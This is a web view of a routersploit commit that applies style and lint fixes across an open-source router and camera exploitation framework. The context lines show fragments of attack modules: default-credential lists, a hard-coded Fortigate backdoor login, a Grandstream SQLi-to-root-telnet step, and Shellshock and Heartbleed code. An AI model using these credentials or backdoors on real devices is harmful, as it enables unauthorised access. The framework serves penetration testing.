Skip to content

R
routersploit
Unverified Commit 62b83fb4 by Marcin Bury Committed by GitHub
Options

Improving code quality (#435)

parent 2ee21d01
Showing with 118 additions and 112 deletions
routersploit/core/bluetooth/btle/__init__.py
...@@ -5,3 +5,10 @@ from .btle_scanner import ( ...@@ -5,3 +5,10 @@ from .btle_scanner import (
BTLEScanner, BTLEScanner,
ScanDelegate ScanDelegate
) )
__all__ = [
"Device",
"BTLEScanner",
"ScanDelegate",
]
routersploit/core/bluetooth/btle/btle_device.py
...@@ -120,7 +120,7 @@ class Device(ScanEntry): ...@@ -120,7 +120,7 @@ class Device(ScanEntry):
for _, c in enumerate(service.getCharacteristics()): for _, c in enumerate(service.getCharacteristics()):
if str(c.uuid) == characteristic: if str(c.uuid) == characteristic:
char =c char = c
break break
if char: if char:
...@@ -221,7 +221,7 @@ class Device(ScanEntry): ...@@ -221,7 +221,7 @@ class Device(ScanEntry):
try: try:
string = color_blue(repr(data.decode("utf-8"))) string = color_blue(repr(data.decode("utf-8")))
except Exception: except Exception:
stirng = repr(data) string = repr(data)
except Exception: except Exception:
pass pass
......
routersploit/core/bluetooth/btle/btle_scanner.py
...@@ -13,7 +13,7 @@ class BTLEScanner(Scanner): ...@@ -13,7 +13,7 @@ class BTLEScanner(Scanner):
def _decode_address(self, resp): def _decode_address(self, resp):
addr = binascii.b2a_hex(resp["addr"][0]).decode("utf-8") addr = binascii.b2a_hex(resp["addr"][0]).decode("utf-8")
return ":".join([addr[i : i + 2] for i in range(0, 12, 2)]) return ":".join([addr[i: i + 2] for i in range(0, 12, 2)])
def _find_or_create(self, addr): def _find_or_create(self, addr):
if addr in self.scanned: if addr in self.scanned:
...@@ -59,6 +59,7 @@ class BTLEScanner(Scanner): ...@@ -59,6 +59,7 @@ class BTLEScanner(Scanner):
if self.mac and dev.addr == self.mac: if self.mac and dev.addr == self.mac:
break break
class ScanDelegate(DefaultDelegate): class ScanDelegate(DefaultDelegate):
def __init__(self, options): def __init__(self, options):
DefaultDelegate.__init__(self) DefaultDelegate.__init__(self)
......
routersploit/core/exploit/__init__.py
...@@ -24,5 +24,28 @@ from routersploit.core.exploit.printer import ( ...@@ -24,5 +24,28 @@ from routersploit.core.exploit.printer import (
print_table, print_table,
) )
import routersploit.core.exploit.utils from routersploit.core.exploit import utils
from routersploit.core.exploit.shell import shell from routersploit.core.exploit.shell import shell
__all__ = [
"Exploit",
"multi",
"mute",
"LockedIterator",
"OptIP",
"OptPort",
"OptInteger",
"OptFloat",
"OptBool",
"OptString",
"OptMAC",
"OptWordlist",
"print_info",
"print_status",
"print_success",
"print_error",
"print_table",
"utils",
"shell",
]
routersploit/core/exploit/exploit.py
import os import os
import threading import threading
import time import time
import concurrent.futures
from future.utils import with_metaclass, iteritems from future.utils import with_metaclass, iteritems
from itertools import chain from itertools import chain
from functools import wraps from functools import wraps
from routersploit.core.exploit.printer import ( from routersploit.core.exploit.printer import (
print_status, print_status,
print_error,
thread_output_stream, thread_output_stream,
) )
from routersploit.core.exploit.option import Option from routersploit.core.exploit.option import Option
...@@ -66,7 +64,6 @@ class Exploit(BaseExploit): ...@@ -66,7 +64,6 @@ class Exploit(BaseExploit):
target_protocol = "custom" target_protocol = "custom"
def run(self): def run(self):
raise NotImplementedError("You have to define your own 'run' method.") raise NotImplementedError("You have to define your own 'run' method.")
...@@ -204,5 +201,3 @@ class Protocol: ...@@ -204,5 +201,3 @@ class Protocol:
HTTP = "http" HTTP = "http"
HTTPS = "https" HTTPS = "https"
SNMP = "snmp" SNMP = "snmp"
routersploit/core/http/http_client.py
...@@ -21,7 +21,6 @@ class HTTPClient(Exploit): ...@@ -21,7 +21,6 @@ class HTTPClient(Exploit):
verbosity = OptBool("true", "Verbosity enabled: true/false") verbosity = OptBool("true", "Verbosity enabled: true/false")
ssl = OptBool("false", "SSL enabled: true/false") ssl = OptBool("false", "SSL enabled: true/false")
def http_request(self, method, path, session=requests, **kwargs): def http_request(self, method, path, session=requests, **kwargs):
if self.ssl: if self.ssl:
url = "https://" url = "https://"
......
routersploit/core/ssh/ssh_client.py
...@@ -156,7 +156,7 @@ class SSHClient(Exploit): ...@@ -156,7 +156,7 @@ class SSHClient(Exploit):
break break
chan.send(x) chan.send(x)
finally: finally:
termios.tcsetattr(sys.stdin,termios.TCSADRAIN, oldtty) termios.tcsetattr(sys.stdin, termios.TCSADRAIN, oldtty)
return return
def _windows_shell(self, chan): def _windows_shell(self, chan):
......
routersploit/interpreter.py
...@@ -333,7 +333,7 @@ class RoutersploitInterpreter(BaseInterpreter): ...@@ -333,7 +333,7 @@ class RoutersploitInterpreter(BaseInterpreter):
except KeyboardInterrupt: except KeyboardInterrupt:
print_info() print_info()
print_error("Operation cancelled by user") print_error("Operation cancelled by user")
except: except Exception:
print_error(traceback.format_exc(sys.exc_info())) print_error(traceback.format_exc(sys.exc_info()))
def command_exploit(self, *args, **kwargs): def command_exploit(self, *args, **kwargs):
......
routersploit/libs/apiros/apiros_client.py
import sys import sys
import time
import binascii import binascii
import hashlib import hashlib
class ApiRosClient(object): class ApiRosClient(object):
"Routeros api" "RouterOS API"
def __init__(self, sk): def __init__(self, sk):
self.sk = sk self.sk = sk
self.currenttag = 0 self.currenttag = 0
...@@ -17,16 +17,21 @@ class ApiRosClient(object): ...@@ -17,16 +17,21 @@ class ApiRosClient(object):
md.update(b'\x00') md.update(b'\x00')
md.update(pwd.encode('UTF-8')) md.update(pwd.encode('UTF-8'))
md.update(chal) md.update(chal)
output = self.talk(["/login", "=name=" + username, output = self.talk([
"=response=00" + binascii.hexlify(md.digest()).decode('UTF-8') ]) "/login",
"=name=" + username,
"=response=00" + binascii.hexlify(md.digest()).decode('UTF-8')
])
return output return output
def talk(self, words): def talk(self, words):
if self.writeSentence(words) == 0: return if self.writeSentence(words) == 0:
return
r = [] r = []
while 1: while 1:
i = self.readSentence(); i = self.readSentence()
if len(i) == 0: continue if len(i) == 0:
continue
reply = i[0] reply = i[0]
attrs = {} attrs = {}
for w in i[1:]: for w in i[1:]:
...@@ -34,9 +39,10 @@ class ApiRosClient(object): ...@@ -34,9 +39,10 @@ class ApiRosClient(object):
if (j == -1): if (j == -1):
attrs[w] = '' attrs[w] = ''
else: else:
attrs[w[:j]] = w[j+1:] attrs[w[: j]] = w[j + 1:]
r.append((reply, attrs)) r.append((reply, attrs))
if reply == '!done': return r if reply == '!done':
return r
def writeSentence(self, words): def writeSentence(self, words):
ret = 0 ret = 0
...@@ -50,7 +56,8 @@ class ApiRosClient(object): ...@@ -50,7 +56,8 @@ class ApiRosClient(object):
r = [] r = []
while 1: while 1:
w = self.readWord() w = self.readWord()
if w == '': return r if w == '':
return r
r.append(w) r.append(w)
def writeWord(self, w): def writeWord(self, w):
...@@ -61,31 +68,30 @@ class ApiRosClient(object): ...@@ -61,31 +68,30 @@ class ApiRosClient(object):
ret = self.readStr(self.readLen()) ret = self.readStr(self.readLen())
return ret return ret
def writeLen(self, l): def writeLen(self, length):
if l < 0x80: if length < 0x80:
self.writeByte((l).to_bytes(1, sys.byteorder)) self.writeByte((length).to_bytes(1, sys.byteorder))
elif l < 0x4000: elif length < 0x4000:
l |= 0x8000 length |= 0x8000
tmp = (l >> 8) & 0xFF self.writeByte(((length >> 8) & 0xFF).to_bytes(1, sys.byteorder))
self.writeByte(((l >> 8) & 0xFF).to_bytes(1, sys.byteorder)) self.writeByte((length & 0xFF).to_bytes(1, sys.byteorder))
self.writeByte((l & 0xFF).to_bytes(1, sys.byteorder)) elif length < 0x200000:
elif l < 0x200000: length |= 0xC00000
l |= 0xC00000 self.writeByte(((length >> 16) & 0xFF).to_bytes(1, sys.byteorder))
self.writeByte(((l >> 16) & 0xFF).to_bytes(1, sys.byteorder)) self.writeByte(((length >> 8) & 0xFF).to_bytes(1, sys.byteorder))
self.writeByte(((l >> 8) & 0xFF).to_bytes(1, sys.byteorder)) self.writeByte((length & 0xFF).to_bytes(1, sys.byteorder))
self.writeByte((l & 0xFF).to_bytes(1, sys.byteorder)) elif length < 0x10000000:
elif l < 0x10000000: length |= 0xE0000000
l |= 0xE0000000 self.writeByte(((length >> 24) & 0xFF).to_bytes(1, sys.byteorder))
self.writeByte(((l >> 24) & 0xFF).to_bytes(1, sys.byteorder)) self.writeByte(((length >> 16) & 0xFF).to_bytes(1, sys.byteorder))
self.writeByte(((l >> 16) & 0xFF).to_bytes(1, sys.byteorder)) self.writeByte(((length >> 8) & 0xFF).to_bytes(1, sys.byteorder))
self.writeByte(((l >> 8) & 0xFF).to_bytes(1, sys.byteorder)) self.writeByte((length & 0xFF).to_bytes(1, sys.byteorder))
self.writeByte((l & 0xFF).to_bytes(1, sys.byteorder))
else: else:
self.writeByte((0xF0).to_bytes(1, sys.byteorder)) self.writeByte((0xF0).to_bytes(1, sys.byteorder))
self.writeByte(((l >> 24) & 0xFF).to_bytes(1, sys.byteorder)) self.writeByte(((length >> 24) & 0xFF).to_bytes(1, sys.byteorder))
self.writeByte(((l >> 16) & 0xFF).to_bytes(1, sys.byteorder)) self.writeByte(((length >> 16) & 0xFF).to_bytes(1, sys.byteorder))
self.writeByte(((l >> 8) & 0xFF).to_bytes(1, sys.byteorder)) self.writeByte(((length >> 8) & 0xFF).to_bytes(1, sys.byteorder))
self.writeByte((l & 0xFF).to_bytes(1, sys.byteorder)) self.writeByte((length & 0xFF).to_bytes(1, sys.byteorder))
def readLen(self): def readLen(self):
c = ord(self.readStr(1)) c = ord(self.readStr(1))
...@@ -120,24 +126,27 @@ class ApiRosClient(object): ...@@ -120,24 +126,27 @@ class ApiRosClient(object):
return c return c
def writeStr(self, str): def writeStr(self, str):
n = 0; n = 0
while n < len(str): while n < len(str):
r = self.sk.send(bytes(str[n:], 'UTF-8')) r = self.sk.send(bytes(str[n:], 'UTF-8'))
if r == 0: raise RuntimeError("connection closed by remote end") if r == 0:
raise RuntimeError("connection closed by remote end")
n += r n += r
def writeByte(self, str): def writeByte(self, str):
n = 0; n = 0
while n < len(str): while n < len(str):
r = self.sk.send(str[n:]) r = self.sk.send(str[n:])
if r == 0: raise RuntimeError("connection closed by remote end") if r == 0:
raise RuntimeError("connection closed by remote end")
n += r n += r
def readStr(self, length): def readStr(self, length):
ret = '' ret = ''
while len(ret) < length: while len(ret) < length:
s = self.sk.recv(length - len(ret)) s = self.sk.recv(length - len(ret))
if s == '': raise RuntimeError("connection closed by remote end") if s == '':
raise RuntimeError("connection closed by remote end")
ret += s.decode('UTF-8', 'replace') ret += s.decode('UTF-8', 'replace')
return ret return ret
routersploit/libs/lzs/lzs.py
...@@ -20,7 +20,6 @@ ...@@ -20,7 +20,6 @@
# #
############################################################## ##############################################################
import sys
import collections import collections
......
routersploit/modules/creds/cameras/cisco/ftp_default_creds.py
...@@ -19,5 +19,3 @@ class Exploit(FTPDefault): ...@@ -19,5 +19,3 @@ class Exploit(FTPDefault):
threads = OptInteger(1, "Number of threads") threads = OptInteger(1, "Number of threads")
defaults = OptWordlist("admin:admin", "User:Pass or file with default credentials (file://)") defaults = OptWordlist("admin:admin", "User:Pass or file with default credentials (file://)")
routersploit/modules/creds/cameras/dlink/ssh_default_creds.py
...@@ -20,4 +20,3 @@ class Exploit(SSHDefault): ...@@ -20,4 +20,3 @@ class Exploit(SSHDefault):
threads = OptInteger(1, "Number of threads") threads = OptInteger(1, "Number of threads")
defaults = OptWordlist("admin:admin", "User:Pass or file with default credentials (file://)") defaults = OptWordlist("admin:admin", "User:Pass or file with default credentials (file://)")
routersploit/modules/creds/cameras/geovision/ftp_default_creds.py
...@@ -20,4 +20,3 @@ class Exploit(FTPDefault): ...@@ -20,4 +20,3 @@ class Exploit(FTPDefault):
threads = OptInteger(1, "Number of threads") threads = OptInteger(1, "Number of threads")
defaults = OptWordlist("admin:admin", "User:Pass or file with default credentials (file://)") defaults = OptWordlist("admin:admin", "User:Pass or file with default credentials (file://)")
routersploit/modules/creds/cameras/videoiq/ftp_default_creds.py
...@@ -20,4 +20,3 @@ class Exploit(FTPDefault): ...@@ -20,4 +20,3 @@ class Exploit(FTPDefault):
threads = OptInteger(1, "Number of threads") threads = OptInteger(1, "Number of threads")
defaults = OptWordlist("supervisor:supervisor", "User:Pass or file with default credentials (file://)") defaults = OptWordlist("supervisor:supervisor", "User:Pass or file with default credentials (file://)")
routersploit/modules/creds/cameras/videoiq/ssh_default_creds.py
...@@ -20,4 +20,3 @@ class Exploit(SSHDefault): ...@@ -20,4 +20,3 @@ class Exploit(SSHDefault):
threads = OptInteger(1, "Number of threads") threads = OptInteger(1, "Number of threads")
default = OptWordlist("supervistor:supervisor", "User:Pass or file with default credentials (file://)") default = OptWordlist("supervistor:supervisor", "User:Pass or file with default credentials (file://)")
routersploit/modules/creds/routers/asmax/telnet_default_creds.py
...@@ -20,4 +20,3 @@ class Exploit(TelnetDefault): ...@@ -20,4 +20,3 @@ class Exploit(TelnetDefault):
threads = OptInteger(1, "Number of threads") threads = OptInteger(1, "Number of threads")
defaults = OptWordlist("admin:admin,support:support,user:user", "User:Pass or file with default credentials (file://)") defaults = OptWordlist("admin:admin,support:support,user:user", "User:Pass or file with default credentials (file://)")
routersploit/modules/creds/routers/belkin/ftp_default_creds.py
...@@ -20,4 +20,3 @@ class Exploit(FTPDefault): ...@@ -20,4 +20,3 @@ class Exploit(FTPDefault):
threads = OptInteger(1, "Number of threads") threads = OptInteger(1, "Number of threads")
defaults = OptWordlist("admin:admin,admin:password", "User:Pass or file with default credentials (file://)") defaults = OptWordlist("admin:admin,admin:password", "User:Pass or file with default credentials (file://)")
routersploit/modules/creds/routers/ipfire/telnet_default_creds.py
...@@ -15,7 +15,6 @@ class Exploit(TelnetDefault): ...@@ -15,7 +15,6 @@ class Exploit(TelnetDefault):
), ),
} }
target = OptIP("", "Target IPv4, IPv6 address or file with ip:port (file://)") target = OptIP("", "Target IPv4, IPv6 address or file with ip:port (file://)")
port = OptPort(23, "Target Telnet port") port = OptPort(23, "Target Telnet port")
......
routersploit/modules/creds/routers/pfsense/webinterface_http_form_default_creds.py
import re
from routersploit.core.exploit import * from routersploit.core.exploit import *
from routersploit.core.http.http_client import HTTPClient from routersploit.core.http.http_client import HTTPClient
...@@ -48,7 +47,6 @@ class Exploit(HTTPClient): ...@@ -48,7 +47,6 @@ class Exploit(HTTPClient):
def target_function(self, data): def target_function(self, data):
username, password = data.split(":") username, password = data.split(":")
def check(self): def check(self):
response = self.http_request( response = self.http_request(
method="GET", method="GET",
...@@ -57,9 +55,7 @@ class Exploit(HTTPClient): ...@@ -57,9 +55,7 @@ class Exploit(HTTPClient):
if response is None: if response is None:
return False return False
if all([x in response.text if all([x in response.text for x in ['<script type="text/javascript" src="/themes/pfsense_ng/javascript/niftyjsCode.js"></script>', 'var csrfMagicToken =']]):
for x in ['<script type="text/javascript" src="/themes/pfsense_ng/javascript/niftyjsCode.js"></script>',
'var csrfMagicToken =']]):
return True return True
return False return False
......
routersploit/modules/creds/routers/ubiquiti/ssh_default_creds.py
...@@ -20,4 +20,3 @@ class Exploit(SSHDefault): ...@@ -20,4 +20,3 @@ class Exploit(SSHDefault):
threads = OptInteger(1, "Number of threads") threads = OptInteger(1, "Number of threads")
defaults = OptWordlist("admin:admin,root:ubnt,ubnt:ubnt", "User:Pass or file with default credentials (file://)") defaults = OptWordlist("admin:admin,root:ubnt,ubnt:ubnt", "User:Pass or file with default credentials (file://)")
routersploit/modules/exploits/cameras/dlink/dcs_930l_932l_auth_bypass.py
...@@ -26,10 +26,9 @@ class Exploit(HTTPClient): ...@@ -26,10 +26,9 @@ class Exploit(HTTPClient):
port = OptPort(8080, "Target HTTP port") port = OptPort(8080, "Target HTTP port")
def __init__(self): def __init__(self):
config_content = None self.config_content = None
def run(self): def run(self):
if self.check(): if self.check():
print_success("Target appears to be vulnerable.") print_success("Target appears to be vulnerable.")
...@@ -115,4 +114,3 @@ class Exploit(HTTPClient): ...@@ -115,4 +114,3 @@ class Exploit(HTTPClient):
ret_str += tmp_str[i + half_str_len] + tmp_str[i] ret_str += tmp_str[i + half_str_len] + tmp_str[i]
return ret_str return ret_str
routersploit/modules/exploits/cameras/grandstream/gxv3611hd_ip_camera_backdoor.py
...@@ -42,7 +42,6 @@ class Exploit(TelnetClient): ...@@ -42,7 +42,6 @@ class Exploit(TelnetClient):
print_success("SQLI successful, going to telnet into port 20000 " print_success("SQLI successful, going to telnet into port 20000 "
"with username root and no password to get shell") "with username root and no password to get shell")
tn = self.telnet_login("root", "", port=20000) tn = self.telnet_login("root", "", port=20000)
if tn: if tn:
self.telnet_interactive(tn) self.telnet_interactive(tn)
......
routersploit/modules/exploits/cameras/multi/P2P_wificam_credential_disclosure.py
import requests
from routersploit.core.exploit import * from routersploit.core.exploit import *
from routersploit.core.http.http_client import HTTPClient from routersploit.core.http.http_client import HTTPClient
......
routersploit/modules/exploits/cameras/multi/netwave_ip_camera_information_disclosure.py
...@@ -59,7 +59,7 @@ class Exploit(HTTPClient): ...@@ -59,7 +59,7 @@ class Exploit(HTTPClient):
for chunk in response.iter_content(chunk_size=100): for chunk in response.iter_content(chunk_size=100):
if "admin" in chunk: if "admin" in chunk:
print_success(chunk) print_success(chunk)
except: except Exception:
print_error("Exploit failed - could not read /proc/kcore") print_error("Exploit failed - could not read /proc/kcore")
@mute @mute
......
routersploit/modules/exploits/generic/heartbleed.py
...@@ -150,7 +150,8 @@ class Exploit(TCPClient): ...@@ -150,7 +150,8 @@ class Exploit(TCPClient):
a, b = item.span() a, b = item.span()
clean_data += data[tmp_b:a] clean_data += data[tmp_b:a]
tmp_b = b tmp_b = b
clean_data += "................................ repeated {} times ................................".format(b-a-64) repeated = b - a - 64
clean_data += "................................ repeated {} times ................................".format(repeated)
clean_data += data[b:] clean_data += data[b:]
print_info(clean_data) print_info(clean_data)
...@@ -268,12 +269,12 @@ class Exploit(TCPClient): ...@@ -268,12 +269,12 @@ class Exploit(TCPClient):
def parse_server_hello(self, data): def parse_server_hello(self, data):
version = unpack(">H", data[:2])[0] version = unpack(">H", data[:2])[0]
print_status("\t\tServer Hello Version: 0x{:x}".format(version)) print_status("\t\tServer Hello Version: 0x{:x}".format(version))
random = unpack(">" + "B"*32, data[2:34]) random = unpack(">" + "B" * 32, data[2:34])
random_hex = str(binascii.hexlify(bytes(random)), "utf-8") random_hex = str(binascii.hexlify(bytes(random)), "utf-8")
print_status("\t\tServer Hello random data: {}".format(random_hex)) print_status("\t\tServer Hello random data: {}".format(random_hex))
session_id_length = unpack(">B", data[34:35])[0] session_id_length = unpack(">B", data[34:35])[0]
print_status("\t\tServer Hello Session ID length: {}".format(session_id_length)) print_status("\t\tServer Hello Session ID length: {}".format(session_id_length))
session_id = unpack(">" + "B"*session_id_length, data[35: 35 + session_id_length]) session_id = unpack(">" + "B" * session_id_length, data[35: 35 + session_id_length])
session_id_hex = str(binascii.hexlify(bytes(session_id)), "utf-8") session_id_hex = str(binascii.hexlify(bytes(session_id)), "utf-8")
print_status("\t\tServer Hello session id: {}".format(session_id_hex)) print_status("\t\tServer Hello session id: {}".format(session_id_hex))
...@@ -282,22 +283,21 @@ class Exploit(TCPClient): ...@@ -282,22 +283,21 @@ class Exploit(TCPClient):
print_status("\t\tCertificates length: {}".format(cert_len)) print_status("\t\tCertificates length: {}".format(cert_len))
print_status("\t\tData length: {}".format(len(data))) print_status("\t\tData length: {}".format(len(data)))
#contains multiple certs # contains multiple certs
already_read = 3 already_read = 3
cert_counter = 0 cert_counter = 0
while already_read < cert_len: while already_read < cert_len:
cert_counter += 1 cert_counter += 1
# get single certificate length # get single certificate length
single_cert_len_padding, single_cert_len = unpack(">BH", data[already_read:already_read+3]) single_cert_len_padding, single_cert_len = unpack(">BH", data[already_read: already_read + 3])
print_status("\t\tCertificate {}".format(cert_counter)) print_status("\t\tCertificate {}".format(cert_counter))
print_status("\t\t\tCertificate {}: Length: {}".format(cert_counter, single_cert_len)) print_status("\t\t\tCertificate {}: Length: {}".format(cert_counter, single_cert_len))
certificate_data = data[(already_read + 3): (already_read+3+single_cert_len)] certificate_data = data[(already_read + 3): (already_read + 3 + single_cert_len)]
cert = x509.load_der_x509_certificate(certificate_data, default_backend()) cert = x509.load_der_x509_certificate(certificate_data, default_backend())
print_status("\t\t\tCertificate {}: {}".format(cert_counter, cert)) print_status("\t\t\tCertificate {}: {}".format(cert_counter, cert))
already_read = already_read + single_cert_len + 3 already_read = already_read + single_cert_len + 3
def get_ssl_record(self): def get_ssl_record(self):
hdr = self.tcp_recv(self.tcp_client, self.SSL_RECORD_HEADER_SIZE) hdr = self.tcp_recv(self.tcp_client, self.SSL_RECORD_HEADER_SIZE)
......
routersploit/modules/exploits/generic/shellshock.py
...@@ -44,8 +44,6 @@ class Exploit(HTTPClient): ...@@ -44,8 +44,6 @@ class Exploit(HTTPClient):
def execute(self, cmd): def execute(self, cmd):
marker = utils.random_text(32) marker = utils.random_text(32)
url = "{}:{}{}".format(self.target, self.port, self.path)
injection = self.valid.replace("{{marker}}", marker).replace("{{cmd}}", cmd) injection = self.valid.replace("{{marker}}", marker).replace("{{cmd}}", cmd)
headers = { headers = {
...@@ -76,8 +74,6 @@ class Exploit(HTTPClient): ...@@ -76,8 +74,6 @@ class Exploit(HTTPClient):
cmd = "echo $(({}-1))".format(number) cmd = "echo $(({}-1))".format(number)
marker = utils.random_text(32) marker = utils.random_text(32)
url = "{}:{}{}".format(self.target, self.port, self.path)
for payload in self.payloads: for payload in self.payloads:
injection = payload.replace("{{marker}}", marker).replace("{{cmd}}", cmd) injection = payload.replace("{{marker}}", marker).replace("{{cmd}}", cmd)
......
routersploit/modules/exploits/routers/2wire/gateway_auth_bypass.py
...@@ -48,8 +48,6 @@ class Exploit(HTTPClient): ...@@ -48,8 +48,6 @@ class Exploit(HTTPClient):
return False # target is not vulnerable return False # target is not vulnerable
# checking if authentication can be bypassed # checking if authentication can be bypassed
url = "{}:{}/xslt".format(self.target, self.port)
response = self.http_request( response = self.http_request(
method="GET", method="GET",
path="/xslt", path="/xslt",
......
routersploit/modules/exploits/routers/billion/billion_7700nr4_password_disclosure.py
...@@ -46,7 +46,7 @@ class Exploit(HTTPClient): ...@@ -46,7 +46,7 @@ class Exploit(HTTPClient):
try: try:
print_status("Trying to base64 decode") print_status("Trying to base64 decode")
password = base64.b64decode(res[0]) password = base64.b64decode(res[0])
except: except Exception:
print_error("Exploit failed - could not decode password") print_error("Exploit failed - could not decode password")
return return
......
routersploit/modules/exploits/routers/cisco/catalyst_2960_rocem.py
...@@ -178,7 +178,7 @@ class Exploit(TCPClient): ...@@ -178,7 +178,7 @@ class Exploit(TCPClient):
print_status("Connection OK") print_status("Connection OK")
print_status("Received bytes from telnet service: {}".format(repr(s.recv(1024)))) print_status("Received bytes from telnet service: {}".format(repr(s.recv(1024))))
except: except Exception:
print_error("Connection failed") print_error("Connection failed")
return return
...@@ -201,7 +201,7 @@ class Exploit(TCPClient): ...@@ -201,7 +201,7 @@ class Exploit(TCPClient):
try: try:
t = telnetlib.Telnet(self.target, int(self.telnet_port)) t = telnetlib.Telnet(self.target, int(self.telnet_port))
t.interact() t.interact()
except: except Exception:
print_error("Exploit failed") print_error("Exploit failed")
else: else:
print_status("Check if Telnet authentication was set back") print_status("Check if Telnet authentication was set back")
......
routersploit/modules/exploits/routers/cisco/firepower_management60_rce.py
...@@ -114,15 +114,12 @@ class Exploit(HTTPClient, SSHClient): ...@@ -114,15 +114,12 @@ class Exploit(HTTPClient, SSHClient):
"file": (sh_name, payload) "file": (sh_name, payload)
} }
try:
self.http_request( self.http_request(
method="POST", method="POST",
path="/DetectionPolicy/rules/rulesimport.cgi", path="/DetectionPolicy/rules/rulesimport.cgi",
files=multipart_form_data, files=multipart_form_data,
session=self.session session=self.session
) )
except:
pass
return return
......
routersploit/modules/exploits/routers/comtrend/ct_5361t_password_disclosure.py
...@@ -75,7 +75,7 @@ class Exploit(HTTPClient): ...@@ -75,7 +75,7 @@ class Exploit(HTTPClient):
if len(res): if len(res):
try: try:
b64decode(res[0]) # checking if data is base64 encoded b64decode(res[0]) # checking if data is base64 encoded
except: except Exception:
return False # target is not vulnerable return False # target is not vulnerable
else: else:
return False # target is not vulnerable return False # target is not vulnerable
......
routersploit/modules/exploits/routers/dlink/dir_300_645_815_upnp_rce.py
...@@ -67,7 +67,7 @@ class Exploit(UDPClient): ...@@ -67,7 +67,7 @@ class Exploit(UDPClient):
sock.send(buf) sock.send(buf)
response = sock.recv(65535) response = sock.recv(65535)
sock.close() sock.close()
except: except Exception:
return False # target is not vulnerable return False # target is not vulnerable
if "Linux, UPnP/1.0, DIR-" in response: if "Linux, UPnP/1.0, DIR-" in response:
......
routersploit/modules/exploits/routers/dlink/dir_815_850l_rce.py
from routersploit.core.exploit import * from routersploit.core.exploit import *
from routersploit.core.udp.udp_client import UDPClient from routersploit.core.udp.udp_client import UDPClient
class Exploit(UDPClient): class Exploit(UDPClient):
__info__ = { __info__ = {
"name": "D-Link DIR-815 & DIR-850L RCE", "name": "D-Link DIR-815 & DIR-850L RCE",
......
routersploit/modules/exploits/routers/dlink/dir_850l_creds_disclosure.py
...@@ -25,7 +25,6 @@ class Exploit(HTTPClient): ...@@ -25,7 +25,6 @@ class Exploit(HTTPClient):
target = OptIP("", "Target IPv4 or IPv6 address") target = OptIP("", "Target IPv4 or IPv6 address")
port = OptPort(80, "Target HTTP port") port = OptPort(80, "Target HTTP port")
def run(self): def run(self):
self.credentials = [] self.credentials = []
......
routersploit/modules/exploits/routers/dlink/dwl_3200ap_password_disclosure.py
...@@ -3,7 +3,6 @@ from routersploit.core.exploit import * ...@@ -3,7 +3,6 @@ from routersploit.core.exploit import *
from routersploit.core.http.http_client import HTTPClient from routersploit.core.http.http_client import HTTPClient
class Exploit(HTTPClient): class Exploit(HTTPClient):
__info__ = { __info__ = {
"name": "D-Link DWL-3200AP Password Disclosure", "name": "D-Link DWL-3200AP Password Disclosure",
......
routersploit/modules/exploits/routers/dlink/dwr_932b_backdoor.py
...@@ -35,7 +35,7 @@ class Exploit(TCPClient, TelnetClient): ...@@ -35,7 +35,7 @@ class Exploit(TCPClient, TelnetClient):
try: try:
sock.sendto(b"HELODBG", (self.target, 39889)) sock.sendto(b"HELODBG", (self.target, 39889))
response = sock.recv(1024) response = sock.recv(1024)
except: except Exception:
pass pass
sock.close() sock.close()
...@@ -47,7 +47,7 @@ class Exploit(TCPClient, TelnetClient): ...@@ -47,7 +47,7 @@ class Exploit(TCPClient, TelnetClient):
try: try:
tn = telnetlib.Telnet(self.target, self.telnet_port) tn = telnetlib.Telnet(self.target, self.telnet_port)
tn.interact() tn.interact()
except: except Exception:
print_error("Exploit failed - could not connect to the telnet service") print_error("Exploit failed - could not connect to the telnet service")
else: else:
print_error("Exploit failed - target seems to be not vulnerable") print_error("Exploit failed - target seems to be not vulnerable")
...@@ -64,7 +64,7 @@ class Exploit(TCPClient, TelnetClient): ...@@ -64,7 +64,7 @@ class Exploit(TCPClient, TelnetClient):
if "Hello" in response: if "Hello" in response:
sock.sendto(b"BYEDBG", (self.target, 39889)) sock.sendto(b"BYEDBG", (self.target, 39889))
return True # target is vulnerable return True # target is vulnerable
except: except Exception:
pass pass
return False # target is not vulnerable return False # target is not vulnerable
routersploit/modules/exploits/routers/dlink/multi_hnap_rce.py
from routersploit.core.exploit import * from routersploit.core.exploit import *
from routersploit.core.http.http_client import HTTPClient from routersploit.core.http.http_client import HTTPClient
class Exploit(HTTPClient): class Exploit(HTTPClient):
__info__ = { __info__ = {
"name": "D-Link Multi HNAP RCE", "name": "D-Link Multi HNAP RCE",
......
routersploit/modules/exploits/routers/fortinet/fortigate_os_backdoor.py
...@@ -36,7 +36,7 @@ class Exploit(SSHClient): ...@@ -36,7 +36,7 @@ class Exploit(SSHClient):
client.connect(self.target, self.port, username='', allow_agent=False, look_for_keys=False) client.connect(self.target, self.port, username='', allow_agent=False, look_for_keys=False)
except paramiko.ssh_exception.SSHException: except paramiko.ssh_exception.SSHException:
pass pass
except: except Exception:
print_error("Exploit Failed - SSH Service is down") print_error("Exploit Failed - SSH Service is down")
return return
...@@ -45,7 +45,7 @@ class Exploit(SSHClient): ...@@ -45,7 +45,7 @@ class Exploit(SSHClient):
trans.auth_password(username='Fortimanager_Access', password='', event=None, fallback=True) trans.auth_password(username='Fortimanager_Access', password='', event=None, fallback=True)
except paramiko.ssh_exception.AuthenticationException: except paramiko.ssh_exception.AuthenticationException:
pass pass
except: except Exception:
print_status("Error with Existing Session. Wait few minutes.") print_status("Error with Existing Session. Wait few minutes.")
return return
...@@ -54,7 +54,7 @@ class Exploit(SSHClient): ...@@ -54,7 +54,7 @@ class Exploit(SSHClient):
print_success("Exploit succeeded") print_success("Exploit succeeded")
ssh_interactive(client) ssh_interactive(client)
except: except Exception:
print_error("Exploit failed") print_error("Exploit failed")
return return
...@@ -67,7 +67,7 @@ class Exploit(SSHClient): ...@@ -67,7 +67,7 @@ class Exploit(SSHClient):
client.connect(self.target, self.port, username='', allow_agent=False, look_for_keys=False) client.connect(self.target, self.port, username='', allow_agent=False, look_for_keys=False)
except paramiko.ssh_exception.SSHException: except paramiko.ssh_exception.SSHException:
pass pass
except: except Exception:
return False # target is not vulnerable return False # target is not vulnerable
trans = client.get_transport() trans = client.get_transport()
...@@ -75,12 +75,12 @@ class Exploit(SSHClient): ...@@ -75,12 +75,12 @@ class Exploit(SSHClient):
trans.auth_password(username='Fortimanager_Access', password='', event=None, fallback=True) trans.auth_password(username='Fortimanager_Access', password='', event=None, fallback=True)
except paramiko.ssh_exception.AuthenticationException: except paramiko.ssh_exception.AuthenticationException:
pass pass
except: except Exception:
return None # could not verify return None # could not verify
try: try:
